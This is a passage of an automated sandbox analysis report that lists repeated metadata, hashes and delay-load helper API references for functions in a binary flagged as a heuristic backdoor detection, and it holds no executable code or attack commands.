                                                • API String ID: 1269201914-0
                                                • Opcode ID: 14924fd2d263d723da3a21a7f53b6b4aa665ce73c14ff3b97de4a091867181f1
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 14924fd2d263d723da3a21a7f53b6b4aa665ce73c14ff3b97de4a091867181f1
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b81e4527665b3fa0c47f8864d1cb1029db63a260e785a968fa4a5c1746d251f3
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: b81e4527665b3fa0c47f8864d1cb1029db63a260e785a968fa4a5c1746d251f3
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8c64d69dc72efa8ca72198a36496a6f8f436d27b5b75861e0edcb33037714a58
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 8c64d69dc72efa8ca72198a36496a6f8f436d27b5b75861e0edcb33037714a58
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a1e580153f00bd471a42c0678dd7f0fef89e6ac225fafd2a4f3e64d0027a4b55
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: a1e580153f00bd471a42c0678dd7f0fef89e6ac225fafd2a4f3e64d0027a4b55
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 0c6a826b6c0a15e0fd4cbd0024c1fa4ca9d1eb0d70ba0ba6e174bffaad13990c
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 0c6a826b6c0a15e0fd4cbd0024c1fa4ca9d1eb0d70ba0ba6e174bffaad13990c
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 416f86dcabefc99b05faa17136819500fa07143e50c1759454b0e6456ecc7423
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 416f86dcabefc99b05faa17136819500fa07143e50c1759454b0e6456ecc7423
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8180d1e1a8b2e1cc4aa42afafa891bc1124f5326899eabf39d0542ccd73543aa
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 8180d1e1a8b2e1cc4aa42afafa891bc1124f5326899eabf39d0542ccd73543aa
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 7314435d17ab17b02bb62296d8f589e4704c322790c3ed7d53e3e639ef3b2dc6
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 7314435d17ab17b02bb62296d8f589e4704c322790c3ed7d53e3e639ef3b2dc6
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 207bd5b26bdd9df7ba90a1fba9cdefbe98c26a729953186922fab063598d9a3f
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 207bd5b26bdd9df7ba90a1fba9cdefbe98c26a729953186922fab063598d9a3f
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 42cd2240d71bae4c7d98c96e8b4a1fc55e01ccd88363538d6654d2d440ccfe45
                                                • Instruction ID: e03b86cbb504b163cb8d4511b5de9d491f070c356b980664e0e3f0c24e5c78fa
                                                • Opcode Fuzzy Hash: 42cd2240d71bae4c7d98c96e8b4a1fc55e01ccd88363538d6654d2d440ccfe45
                                                • Instruction Fuzzy Hash: 91A0129126E0417C3058B103AC06C3A020CD0C4B11330811AF426D0184544C0D040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: fa28cde91e88cd307c6ad3a34c807ac378978038c9d7ab74a14d115b04f84674
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: fa28cde91e88cd307c6ad3a34c807ac378978038c9d7ab74a14d115b04f84674
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: dadb937219916bc1d3e5d21d7fa51c6a2d396a0a855ec119f2a8041773ddc361
                                                • Instruction ID: fa24951a9b4b354147c67fb74aec9b929b94bd46ae4666a4b334078811ee299f
                                                • Opcode Fuzzy Hash: dadb937219916bc1d3e5d21d7fa51c6a2d396a0a855ec119f2a8041773ddc361
                                                • Instruction Fuzzy Hash: 2FA0029556E542BC715C61526D16D7A021CD4C8B913304919B516D51E165886D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDC36
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 5d3c55b96889eb444bfed2b968885ef95332c0a40c9bc79a3a539b6fd361a3d5
                                                • Instruction ID: fa24951a9b4b354147c67fb74aec9b929b94bd46ae4666a4b334078811ee299f
                                                • Opcode Fuzzy Hash: 5d3c55b96889eb444bfed2b968885ef95332c0a40c9bc79a3a539b6fd361a3d5
                                                • Instruction Fuzzy Hash: 2FA0029556E542BC715C61526D16D7A021CD4C8B913304919B516D51E165886D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: f04bdc5753f7194f1b1b63d738d5dd938bcc076351859d20bebf3736ed76f18b
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: f04bdc5753f7194f1b1b63d738d5dd938bcc076351859d20bebf3736ed76f18b
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b5ca027b925a0d614f431fa2f0b97bca9aa2e5eb8ce4742d0aee5092b1ddd5b8
                                                • Instruction ID: cccbba2fbee19523821954606256a989bbaad01ba15c0ecc54eff7cf03852a67
                                                • Opcode Fuzzy Hash: b5ca027b925a0d614f431fa2f0b97bca9aa2e5eb8ce4742d0aee5092b1ddd5b8
                                                • Instruction Fuzzy Hash: A3A002D627E146BC715851526D1BD76021CD4C8B613315519B516D41C16A585D455431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
